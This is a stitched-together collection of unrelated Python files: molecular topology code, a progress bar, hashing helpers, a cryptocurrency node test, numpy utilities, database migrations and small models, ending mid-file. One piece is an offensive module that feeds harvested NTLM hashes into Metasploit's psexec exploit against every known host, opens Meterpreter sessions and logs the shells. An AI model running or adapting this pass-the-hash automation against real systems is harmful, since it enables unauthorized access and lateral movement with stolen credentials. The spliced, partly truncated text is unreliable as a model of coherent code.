self.qstruct = qstruct
try:
self.qlib.check_valid() # check if lib entries are good
except qlibrary.QLibError as e:
raise QTopologyError(e)
self.residues = []
self.atoms = []
self.bonds = []
self.angles = []
self.torsions = []
self.impropers = []
for residue_struct in self.qstruct.residues:
# see if it is defined in the library
try:
residue_lib = self.qlib.residue_dict[residue_struct.name]
except KeyError:
raise QTopologyError("Residue '{}' not found in library"
.format(residue_struct.name))
# create new object for the residue
res_index = len(self.residues) + 1
residue_top = _TopoResidue(res_index, residue_struct, residue_lib)
self.residues.append(residue_top)
# get atoms and bonds within the residue
self._get_atoms(residue_top)
self._get_bonds(residue_top)
# get angles, torsions and impropers from the bonds
self._get_angles_torsions()
# get impropers (from the lib entries)
self._get_impropers()
def _get_atoms(self, residue_top):
"""
Creates _TopoAtom objects and adds them to
_TopoResidue and QTopology.atoms
"""
# iterate over the atoms in the library
for atom in residue_top.lib.atoms:
aname, atype, charge = atom.name, atom.atom_type, atom.charge
# check if atoms exist in the structure
try:
atom_struct = [a for a in residue_top.struct.atoms
if a.name == aname][0]
except IndexError:
raise QTopologyError("Atom '{}' in residue '{}.{}'"
" missing in the structure"
.format(aname,
residue_top.struct.index_struct,
residue_top.struct.name))
# check if atom parameters exist
try:
atom_prm = self.qprm.atom_types[atype]
except KeyError:
raise QTopologyError("Atom type '{}' not found!"
.format(atype))
# add new atom to list (and to the residue_top)
atom_index = len(self.atoms) + 1
a = _TopoAtom(atom_index, aname, charge, atom_prm,
atom_struct, residue_top)
self.atoms.append(a)
residue_top.add_atom(a)
def _get_bonds(self, residue_top):
"""
Creates _TopoBond objects and adds them to QTopology.bonds
"""
# iterate over the bonds in the library
for bond in residue_top.lib.bonds:
# find the atom objects with those names
atoms = [a for a in residue_top.atoms if a.name in bond]
# find parameters
atom_types = [a.prm.atom_type for a in atoms]
prm_id = qparameter._PrmBond.get_id(atom_types)
try:
bond_prm = self.qprm.bonds[prm_id]
except KeyError:
raise QTopologyError("Bond type '{}' not found!"
.format(prm_id))
# create _TopoBond object
self.bonds.append(_TopoBond(atoms, bond_prm))
try:
# -2 is assuming that the current one was just added (-1)
prev_res = self.residues[-2]
except IndexError:
# first residue
pass
# don't check separate chains
else:
if residue_top.struct.molecule == prev_res.struct.molecule:
for conn in residue_top.lib.connections:
for conn_prev in prev_res.lib.connections:
if "head" in conn and "tail" in conn_prev:
ahead = [a for a in residue_top.atoms if
a.name == conn.split()[1]][0]
atail = [a for a in prev_res.atoms if
a.name == conn_prev.split()[1]][0]
atoms = [atail, ahead]
atom_types = [a.prm.atom_type for a in atoms]
prm_id = qparameter._PrmBond.get_id(atom_types)
try:
bond_prm = self.qprm.bonds[prm_id]
except KeyError:
raise QTopologyError("Bond type '{}'"
"not found!"
.format(prm_id))
# create _TopoBond object
self.bonds.append(_TopoBond(atoms, bond_prm))
def _get_angles_torsions(self):
"""
Creates _TopoAngle and _TopoTorsion objects and
adds them to QTopology.angles and QTopology.torsions
"""
# to prevent backtracking
processed_bonds = set()
# iterate over all bonds and find the angles
for bond1 in self.bonds:
processed_angle_bonds = set()
for bond2 in bond1.atoms[0].bonds + bond1.atoms[1].bonds:
if bond2 == bond1 or bond2 in processed_bonds:
continue
atoms1 = set(bond1.atoms)
atoms2 = set(bond2.atoms)
common_atom = atoms1 & atoms2
side_atoms = atoms1 ^ atoms2
angle_atoms = [side_atoms.pop(),
common_atom.pop(),
side_atoms.pop()]
# find the angle parameter
angle_atypes = [a.prm.atom_type for a in angle_atoms]
prm_id = qparameter._PrmAngle.get_id(angle_atypes)
try:
angle_prm = self.qprm.angles[prm_id]
except KeyError:
raise QTopologyError("Angle type '{}' not found!"
.format(prm_id))
# create _TopoAngle object
self.angles.append(_TopoAngle(angle_atoms, angle_prm))
# find the torsions by looking at the bonds
# of the angle's side atoms
for side_atom_index in [0, 2]:
for bond3 in angle_atoms[side_atom_index].bonds:
if bond3 in processed_bonds or \
bond3 in processed_angle_bonds:
continue
try:
atom4 = [a for a in bond3.atoms
if a not in angle_atoms][0]
except IndexError:
# both atoms are part of the angle
continue
if side_atom_index == 0:
torsion_atoms = [atom4] + angle_atoms
else:
torsion_atoms = angle_atoms + [atom4]
# TODO: QPrm.find_type() would be better
#
# find parameters
atom_types = [a.prm.atom_type for a in torsion_atoms]
prm_id = qparameter._PrmTorsion.get_id(atom_types)
try:
torsion_prm = self.qprm.torsions[prm_id]
except KeyError:
# see if generic parameters exist
gen_atypes = ["?"] + prm_id.split()[1:3] + ["?"]
prm_id_gen = qparameter._PrmTorsion.get_id(gen_atypes)
try:
torsion_prm = \
self.qprm.generic_torsions[prm_id_gen]
except KeyError:
raise QTopologyError("Torsions type '{}' "
"for torsion '{}'"
"not found!"
.format(prm_id,
" ".join([a.name for a in
torsion_atoms])))
# create _TopoTorsion object
self.torsions.append(_TopoTorsion(torsion_atoms,
torsion_prm))
# remove the 'angle' bond from the torsion search
# (otherwise you get forward and reverse duplicates)
processed_angle_bonds.add(bond2)
# remove the bond from the search (to prevent backtracking)
processed_bonds.add(bond1)
def _get_impropers(self):
# create impropers -
# only those that are explicitly defined in the library
for residue_index, residue in enumerate(self.residues):
for improper in residue.lib.impropers:
# find _TopoAtom-s involved
atoms = []
for aname in improper:
res = residue
# some impropers span to next or
# previous residues (-C, +N)
if "+" in aname:
if residue_index+1 == len(self.residues):
continue
res = self.residues[residue_index+1]
if "-" in aname:
if residue_index == 0:
continue
res = self.residues[residue_index-1]
# if separate chains, skip
if residue.struct.molecule != res.struct.molecule:
continue
aname = aname.strip("+-")
try:
atoms.append([a for a in res.atoms
if a.name == aname][0])
except IndexError:
if not res.lib.connections:
# no connectivity between residues
# (end of protein - ligands or water)
continue
else:
raise QTopologyError("Bad improper '{}' between "
"residues '{}' and '{}'"
.format(" ".join(improper),
residue.index,
res.index))
if len(atoms) != 4:
continue
# find parameters
other_atypes = [a.prm.atom_type for a in atoms]
center_atype = other_atypes.pop(1)
prm_id = qparameter._PrmImproper.get_id(center_atype, other_atypes)
try:
improper_prm = self.qprm.impropers[prm_id]
except KeyError:
improper_prm = None
# see if general parameters exist - a lot of options here, example:
# CA O2 CB CN
#
# Single wildcard:
# ? O2 CA CN
# ? O2 CA CB
# ? O2 CB CN
if improper_prm == None:
for i in range(3):
ots = [other_atypes[i], other_atypes[(i+1)%3], "?"]
prm_id_gen = qparameter._PrmImproper.get_id(center_atype, ots)
try:
improper_prm = \
self.qprm.generic_impropers[prm_id_gen]
break
except KeyError:
improper_prm = None
# Two wildcards:
# ? O2 CB ?
# ? O2 CA ?
# ? O2 CN ?
if improper_prm == None:
for i in range(3):
otypes = [other_atypes[i], "?", "?"]
prm_id_gen = qparameter._PrmImproper.get_id(center_atype, otypes)
try:
improper_prm = \
self.qprm.generic_impropers[prm_id_gen]
break
except KeyError:
improper_prm = None
if improper_prm == None:
raise QTopologyError("Improper type '{}' "
"not found!"
.format(prm_id))
# create _TopoImproper object (same order as library)
self.impropers.append(_TopoImproper(atoms, improper_prm))
class _TopoAtom(object):
"""
Class containing topological information for an atom.
Arguments:
index (int): topology index of atom (1-based)
name (string): atom name as defined in the library/structure
charge (float): charge as defined in the QLib library
prm (_PrmAtom): atom parameter as defined in QPrm
struct (_StructAtom): atom structure object (stuff from PDB)
residue (_TopoResidue): reference to its parent residue
All these arguments are stored as object properties with the same name.
Additionaly, bonds, angles, torsions and impropers are lists that contain
references to _TopoBond, _TopoAngles etc. objects. These are filled in
automatically when creating aforementioned objects.
"""
def __init__(self, index, name, charge, prm, struct, residue):
self.index = index
self.name = name
self.charge = charge
self.prm = prm
self.struct = struct
self.residue = residue
self.bonds = []
self.angles = []
self.torsions = []
self.impropers = []
self.bati_map = {_TopoBond: self.bonds,
_TopoAngle: self.angles,
_TopoTorsion: self.torsions,
_TopoImproper: self.impropers}
def __repr__(self):
return "_TopoAtom: {}_{}.{}".format(self.residue.name,
self.residue.index,
self.name)
def add_ref(self, bond_angle_tor_imp):
"""
Add bond, angle, torsion and improper references.
See class docstring.
"""
_type = type(bond_angle_tor_imp)
try:
self.bati_map[_type].append(bond_angle_tor_imp)
except KeyError:
raise TypeError("bond_agle_tor_imp of unsupported "
"type: {}".format(_type))
class _TopoResidue(object):
"""
Class containing topological information for a residue.
Arguments:
index (int): topology index of residue (1-based)
struct (_StructResidue): object with structure information
lib (_LibResidue): object with library information
Besides the two properties above, it contains a list of its atoms
as _TopoAtom objects in the 'atoms' property. This list is filled
automatically as atoms are created with this residue passed in as an
argument.
"""
def __init__(self, index, struct, lib):
self.index = index
self.struct = struct
self.lib = lib
self.name = struct.name
self.atoms = []
def add_atom(self, atom):
"""Append a _TopoAtom object to the 'atoms' list"""
self.atoms.append(atom)
class _TopoBonding(object):
"""Abstract class for topology bonds, angles, torsions and impropers.
Arguments:
atoms (list): list of _TopoAtom objects
prm (_PrmBond): object with bond parameters
"""
def __init__(self, atoms, prm):
self.prm = prm
atom_indexes = [(a.index, a) for a in atoms]
if isinstance(self, _TopoBond):
atom_indexes.sort()
elif isinstance(self, _TopoAngle):
atom_indexes = min(atom_indexes, list(reversed(atom_indexes)))
elif isinstance(self, _TopoTorsion):
atom_indexes = min(atom_indexes, list(reversed(atom_indexes)))
elif isinstance(self, _TopoImproper):
# order is defined in the library
pass
self.atoms = [a for (i,a) in atom_indexes]
for a in self.atoms:
a.add_ref(self)
def __repr__(self):
atoms_str = "-".join([a.name for a in self.atoms])
return "{}: ({})".format(self.__class__.__name__, atoms_str)
class _TopoBond(_TopoBonding):
"""Contains topological information for a bond.
Extends _TopoBonding, implements calc()
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, r=None):
"""Calculate bond distance and energy.
Args:
r (float, optional): define the bond distance instead of
calculating it from the structure
Returns tuple (E [kcal/mol], r [angstrom])
"""
if not r:
ac1, ac2 = [a.struct.coordinates for a in self.atoms]
r = qpotential.bond_distance(ac1, ac2)
e = qpotential.bond_energy(r, self.prm.fc, self.prm.r0)
return (e,r)
class _TopoAngle(_TopoBonding):
"""Contains topological information for an angle.
Extends _TopoBonding, implements calc()
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, theta=None):
"""Calculate angle and energy
Args:
theta (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], theta [degrees])
"""
if theta == None:
ac1, ac2, ac3 = [a.struct.coordinates for a in self.atoms]
theta = qpotential.angle_angle(ac1, ac2, ac3)
e = qpotential.angle_energy(theta,
self.prm.fc,
self.prm.theta0)
return (e, theta)
class _TopoTorsion(_TopoBonding):
"""Contains topological information for a torsion.
Extends _TopoBonding, implements calc(), prm_full
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, phi=None):
"""Calculate torsion angle and energy
Args:
phi (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], phi [degrees])
"""
if phi == None:
ac1, ac2, ac3, ac4 = [a.struct.coordinates for a in self.atoms]
phi = qpotential.torsion_angle(ac1, ac2, ac3, ac4)
energy = 0
for fc, multiplicity, phase, npaths in self.prm.get_prms():
energy += qpotential.torsion_energy(phi,
fc, multiplicity,
npaths, phase)
return (energy, phi)
@property
def prm_full(self):
"""Return full parameter in case it is generic.
Basically, make a copy of the generic parameter,
but use actual atom-types instead of X's.
"""
if self.prm.is_generic:
atypes = [a.prm.prm_id for a in self.atoms]
comment = "Generic: {}".format(self.prm.prm_id)
full_prm = type(self.prm)(atypes, comment=comment)
for p in self.prm.get_prms():
full_prm.add_prm(*p)
return full_prm
else:
return self.prm
class _TopoImproper(_TopoBonding):
"""Contains topological information for an improper.
Extends _TopoBonding, implements calc(), prm_full
"""
def __init__(self, *args):
super(self.__class__, self).__init__(*args)
def calc(self, phi=None):
"""Calculate improper angle and energy
Args:
phi (float, optional): define the angle instead of calculating it
from the structure
Returns tuple (E [kcal/mol], phi [degrees])
"""
if phi == None:
ac1, ac2, ac3, ac4 = [a.struct.coordinates for a in self.atoms]
phi = qpotential.improper_angle(ac1, ac2, ac3, ac4)
e = qpotential.improper_energy_periodic(phi,
self.prm.fc,
self.prm.multiplicity,
self.prm.phi0)
return (e, phi)
@property
def prm_full(self):
"""Return full parameter in case it is generic.
Basically, make a copy of the generic parameter,
but use actual atom-types instead of X's.
"""
if self.prm.is_generic:
atypes = [a.prm.prm_id for a in self.atoms]
center = atypes.pop(1)
comment = "Generic: {}".format(self.prm.prm_id)
full_prm = type(self.prm)(center, atypes, self.prm.fc,
self.prm.phi0, self.prm.multiplicity,
comment=comment)
return full_prm
else:
return self.prm
|
def func_TODO():
'''
TODO
:param: TODO TODO
:return: TODO
'''
pass
class ClassTODO:
'''
TODO
'''
def __init__(self):
'''
Constructor for TODO
'''
pass
def main():
'''
Main execution point of the program
'''
pass
if __name__ == "__main__":
main()
|
from __future__ import print_function
import sys
import re
import time, datetime
class ProgressBar(object):
def __init__(self, total_items):
"""Initialized the ProgressBar object"""
#Vars related to counts/time
self.total_items = total_items
self.current = 0
self.finished = False
self.start_epoch = None #Set to none, start when first iteration occurs
#Vars related to output
self.width = 40 #Length of progress bar
self.symbol = "#" #Needs to be 1 char
self.output = sys.stderr
self.fmt = '''%(percent)3d%% %(bar)s %(current)s/%(total_items)s %(items_per_sec)s ETA: %(eta)s %(bucket_name)s'''
assert len(self.symbol) == 1 #If higher, progress bar won't populate properly
assert self.width <= 150 #If higher, it'll takeup more than one line of text
def __call__(self, num_compelted=1, print_bucket_names=False, bucket_name=""):
"""Actions to run when progress is run"""
#Initialize the start time as the first iteration (just in case progress bar is initialized early)
if self.start_epoch is None:
self.start_epoch = int(time.time())
#Update calculations/values
self.current += num_compelted
try:
percent = self.current / float(self.total_items)
except:
percent = 0
size = int(self.width * percent)
run_time = time.time() - self.start_epoch
remaining = self.total_items - self.current
try:
time_left = (run_time/self.current) * remaining
except:
time_left = 0
#Args to populate into fmt
if print_bucket_names:
bn = "Bucket: %s\n" % (bucket_name)
else:
bn = ""
args = {
'percent': (percent * 100),
'bar': '''[{symbols}{spaces}]'''.format(symbols=(self.symbol * size), spaces=' ' * (self.width - size)),
'current': "{:,}".format(self.current),
'total_items': "{:,}".format(self.total_items),
'items_per_sec': "{items_per_sec}/sec".format(items_per_sec="{:,}".format(int(self.current / run_time))),
'eta': self.get_eta(int(time_left)),
'run_time': self.get_eta(run_time),
'bucket_name': bn,
}
#Print the update
print('\r' + self.fmt%args, file=self.output, end=' ')
def get_eta(self, time_left):
"""Print the num hour, min and/or sec for the given number of seconds"""
time_remaining = time.gmtime(time_left)
months_left = time_remaining.tm_mon-1
days_left = time_remaining.tm_mday-1
if months_left:
return "{months_left}m {days_left}d {hr}h {min}m {sec}s".format(months_left=months_left, days_left=days_left, hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif days_left:
return "{days_left}d {hr}h {min}m {sec}s".format(days_left=days_left, hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif time_remaining.tm_hour:
return "{hr}h {min}m {sec}s".format(hr=time_remaining.tm_hour, min=time_remaining.tm_min, sec=time_remaining.tm_sec)
elif time_remaining.tm_min:
return "{min}m {sec}s".format(min=time_remaining.tm_min, sec=time_remaining.tm_sec)
else:
return "{sec}s".format(sec=time_remaining.tm_sec)
def done(self):
"""Prints completion statement, only once"""
#Be sure done hasn't already been called, set if not
if not self.finished:
self.finished = True
run_time = time.gmtime(time.time() - self.start_epoch)
final_output = '''
FINISHED at {date_time}
Total time: {total_time}
Total completed: {total_items_done}'''.format(
date_time = str(datetime.datetime.now()),
total_items_done = self.current,
total_time = "{hr}h {min}m {sec}s".format(hr=run_time.tm_hour, min=run_time.tm_min, sec=run_time.tm_sec)
)
#Print final output
print('\n{final_output}\n'.format(final_output=final_output), file=self.output)
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
def compute_checksum(data, *algorithms):
checksums = {}
def _finalize(algorithm):
digest = checksums.get(algorithm.name)
if digest:
checksums[algorithm.name] = digest.finalize().encode('hex')
def _update(algorithm, d):
digest = checksums.get(algorithm.name, hashes.Hash(algorithm, backend=default_backend()))
digest.update(d)
checksums[algorithm.name] = digest
#: If the argument is an open file descriptor,
if isinstance(data, file):
while True:
chunk = data.read(100000)
if chunk:
[_update(algorithm, chunk) for algorithm in algorithms]
else:
break
else:
[_update(algorithm, data) for algorithm in algorithms]
#: Finalise each of the cryptographic checksums
[_finalize(algorithm) for algorithm in algorithms]
#: Return a scalar value or a list of items
if len(checksums) == 1:
return checksums.values()[0]
else:
return checksums.values()
def _hash(algorithm, data, backend=default_backend()):
"""
A helper function used to apply a particular cryptographic hash function to a particular object
:param algorithm: an instance of the chosen cryptographic hash function
:param data: the data to be hashed
:param backend: the backend to use for cryptography.io
:return: the output of the selected cryptographic hash function as an integer
"""
digest = hashes.Hash(algorithm, backend)
digest.update(data)
return int(digest.finalize().encode('hex'), 16)
def sha1(data):
"""
A helper function used to apply the SHA-1 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the SHA-1 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.SHA1(), data=data)
def sha256(data):
"""
A helper function used to apply the SHA-256 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the SHA-256 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.SHA256(), data=data)
def md5(data):
"""
A helper function used to apply the MD5 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the MD5 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.MD5(), data=data)
def blake2s(data):
"""
A helper function used to apply the BLAKE-2s cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the BLAKE-2s cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.BLAKE2s, data=data)
def blake2b(data):
"""
A helper function used to apply the BLAKE-2b cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the BLAKE-2b cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.BLAKE2b, data=data)
|
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.test_framework import nealcoinTestFramework
from test_framework.util import *
class MempoolCoinbaseTest(nealcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.98) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
from __future__ import division, print_function
import numpy as np
class OnlineStatistics(object):
def __init__(self, axis=0):
self.axis = axis
self.n = None
self.s = None
self.s2 = None
self.reset()
def reset(self):
self.n = 0
self.s = 0.0
self.s2 = 0.0
def add_data(self, data):
if isinstance(self.axis, (list, tuple)):
self.n += np.prod([data.shape[axis] for axis in self.axis])
else:
self.n += data.shape[self.axis]
self.s += data.sum(axis=self.axis)
self.s2 += (data ** 2).sum(axis=self.axis)
@property
def mean(self):
return self.s / self.n
@property
def std(self):
return np.sqrt((self.s2 - (self.s ** 2) / self.n) / self.n)
def divide_nonzero(a, b):
"""
Return a/b for the nonzero elements of b and return 0 for the zero elements of b.
"""
shape = (a * b).shape
nonzero = b != 0
c = np.zeros(shape)
try:
if a.shape == shape:
a = a[nonzero]
except AttributeError:
pass
try:
if b.shape == shape:
b = b[nonzero]
except AttributeError:
pass
c[nonzero] = a / b
return c
def sample_interval(min_limit, max_limit):
assert min_limit.shape == max_limit.shape
assert min_limit.dtype == max_limit.dtype
if min_limit.dtype == np.int:
return np.array([np.random.random_integers(low, high) for (low, high) in zip(min_limit, max_limit)])
else:
return min_limit + np.random.random_sample(min_limit.shape) * (max_limit - min_limit)
def axis2quat(axis, angle):
axis = np.asarray(axis)
axis = 1.0*axis/axis.sum();
return np.append(np.cos(angle/2.0), axis*np.sin(angle/2.0))
def quaternion_multiply(*qs):
if len(qs) == 2:
q0, q1 = qs
return np.array([-q1[1]*q0[1] - q1[2]*q0[2] - q1[3]*q0[3] + q1[0]*q0[0],
q1[1]*q0[0] + q1[2]*q0[3] - q1[3]*q0[2] + q1[0]*q0[1],
-q1[1]*q0[3] + q1[2]*q0[0] + q1[3]*q0[1] + q1[0]*q0[2],
q1[1]*q0[2] - q1[2]*q0[1] + q1[3]*q0[0] + q1[0]*q0[3]])
else:
return quaternion_multiply(qs[0], quaternion_multiply(*qs[1:]))
def clip_pos_aa(pos_aa, min_dof_limits, max_dof_limits):
assert 3 <= len(pos_aa) <= 6
assert 3 <= len(min_dof_limits) <= 4
assert 3 <= len(max_dof_limits) <= 4
pos, aa = np.split(pos_aa, [3])
pos = np.clip(pos, min_dof_limits[:3], max_dof_limits[:3])
min_angle = min_dof_limits[3] if len(min_dof_limits) > 3 else float('-inf')
max_angle = max_dof_limits[3] if len(max_dof_limits) > 3 else float('inf')
angle = np.linalg.norm(aa)
axis = aa / angle if angle else np.array([0, 0, 1])
angle = np.clip(angle, min_angle, max_angle)
aa = axis * angle
return np.concatenate([pos, aa])
def pack_image(image, fixed_point_min=0.01, fixed_point_max=100.0):
assert image.ndim == 3 and image.shape[2] == 1
image = image.squeeze()
fixed_point_image = np.clip(image, fixed_point_min, fixed_point_max)
fixed_point_image = (2 ** 24) * (fixed_point_image - fixed_point_min) / (fixed_point_max - fixed_point_min)
fixed_point_image = fixed_point_image.astype(np.uint32)
fixed_point_image = fixed_point_image.view(dtype=np.uint8).reshape(fixed_point_image.shape + (4,))[..., :-1]
return fixed_point_image
def unpack_image(fixed_point_image, fixed_point_min=0.01, fixed_point_max=100.0):
fixed_point_image = np.concatenate([fixed_point_image, np.zeros(fixed_point_image.shape[:-1] + (1,), dtype=np.uint8)], axis=-1)
fixed_point_image = fixed_point_image.view(np.uint32).astype(int).squeeze()
fixed_point_image = fixed_point_min + fixed_point_image * (fixed_point_max - fixed_point_min) / (2 ** 24)
image = fixed_point_image.astype(np.float32)
image = np.expand_dims(image, axis=-1)
return image
|
"""Change navigation bar relationship.
Revision ID: f8fcd4bb38cc
Revises: 94f861ea7006
Create Date: 2017-02-11 13:57:03.925474
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
revision = 'f8fcd4bb38cc'
down_revision = '94f861ea7006'
Base = declarative_base()
class Page(Base):
__tablename__ = 'page'
id = sa.Column(sa.Integer, primary_key=True)
path = sa.Column(sa.String(200), unique=True)
needs_paid = sa.Column(sa.Boolean)
type = sa.Column(sa.String(256))
class NavigationEntry(Base):
__tablename__ = 'nagivation_entry'
id = sa.Column(sa.Integer, primary_key=True)
parent_id = sa.Column(sa.Integer, sa.ForeignKey('nagivation_entry.id'))
page_id = sa.Column(sa.Integer, sa.ForeignKey('page.id'))
nl_title = sa.Column(sa.String(256))
en_title = sa.Column(sa.String(256))
url = sa.Column(sa.String(256))
external = sa.Column(sa.Boolean)
activity_list = sa.Column(sa.Boolean)
position = sa.Column(sa.Integer)
def upgrade():
conn = op.get_bind()
Session = sessionmaker()
session = Session(bind=conn)
op.add_column('nagivation_entry', sa.Column('page_id', sa.Integer(), nullable=True))
op.create_foreign_key(op.f('fk_nagivation_entry_page_id_page'), 'nagivation_entry', 'page',
['page_id'], ['id'])
nav_entries = session.query(NavigationEntry).all()
for nav_entry in nav_entries:
page = session.query(Page).filter(Page.path == nav_entry.url.strip('/')).first()
if page is None:
continue
nav_entry.page_id = page.id
nav_entry.url = None
session.add(nav_entry)
session.commit()
op.drop_constraint('page_ibfk_2', 'page', type_='foreignkey')
op.drop_column('page', 'navigation_entry_id')
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('page', sa.Column('navigation_entry_id', mysql.INTEGER(display_width=11),
autoincrement=False, nullable=True))
op.create_foreign_key('page_ibfk_2', 'page', 'nagivation_entry', ['navigation_entry_id'],
['id'])
op.drop_constraint(op.f('fk_nagivation_entry_page_id_page'), 'nagivation_entry',
type_='foreignkey')
op.drop_column('nagivation_entry', 'page_id')
### end Alembic commands ###
|
"""
A stream buffer abstraction
StreamBuf is similar to StringIO (or cStringIO)
but will continue to return the same data on
read() until you ack(n), which advances the read
pointer. close()'ing a StreamBuf marks it as
closed but does not prevent further reads -- useful
for allowing a producer to let a consumer know
that there isn't more data coming.
Usage:
s = StreamBuf('Hello')
s.write(', world!')
print s.read()
-> 'Hello, world!'
s.ack(7)
print s.read()
-> 'world!'
s.ack(6)
print s.read()
-> ''
s.close()
Limitations:
- StreamBuf has no seatbelt, no checks
- Not thread safe
"""
import os
import cStringIO
class StreamBuf(object):
def __init__(self, data = None):
self._buf = ''
self._pos = 0
self._eof = False
self._ready = False
if data:
self.write(data)
def write(self, data):
self._ready = True
self._buf += data
def ack(self, bytes):
self._pos += bytes
def seek(self, pos):
self._pos = pos
def read(self):
return self._buf[self._pos:]
def close(self):
self._eof = True
def buffer(self):
return self._buf
def clear(self):
self._buf = ''
self._pos = 0
self._eof = False
self._ready = False
def complete(self):
return self.closed() and self._pos >= len(self._buf)
def closed(self):
return self._eof
def ready(self):
return self._ready
|
from app import db
from app.models.base_model import BaseEntity
from app.models.contact import Contact
from app.models.location import Location
class Company(db.Model, BaseEntity):
__tablename__ = 'company'
name = db.Column(db.String(200), unique=True)
description = db.Column(db.Text())
logo_file_id = db.Column(db.Integer, db.ForeignKey('file.id'),
nullable=True)
website = db.Column(db.String(256))
contract_start_date = db.Column(db.Date)
contract_end_date = db.Column(db.Date)
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
contact_id = db.Column(db.Integer, db.ForeignKey('contact.id'))
rank = db.Column(db.Integer)
location = db.relationship(Location, backref=db.backref('companies',
lazy='dynamic'))
contact = db.relationship(Contact, backref=db.backref('companies',
lazy='dynamic'))
expired: bool
|
import re
from core.actionModule import actionModule
from core.keystore import KeyStore as kb
from core.mymsf import myMsf
from core.utils import Utils
class exploit_msf_psexec_pth(actionModule):
def __init__(self, config, display, lock):
super(exploit_msf_psexec_pth, self).__init__(config, display, lock)
self.title = "Attempt to authenticate via PSEXEC PTH"
self.shortName = "MSFpsexec"
self.description = "execute [use exploit/windows/smb/psexec] on each target"
self.requirements = ["msfconsole"]
self.triggers = ["newNTLMHash"]
self.types = ["passwords"]
self.safeLevel = 4
def getTargets(self):
# we are interested only in the hosts that had nullsessions
self.targets = kb.get('host')
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = self.getUsers(t)
for user in users:
hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("shell/" + t + "/msf/" + str(part))
# clean up after ourselves
result = msf.cleanup()
return
|
from __future__ import unicode_literals
import accelerator_abstract.models.base_expert_interest
import accelerator_abstract.models.secure_file_system_storage
import accelerator_abstract.utils
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import embed_video.fields
import mptt.fields
import sitetree.models
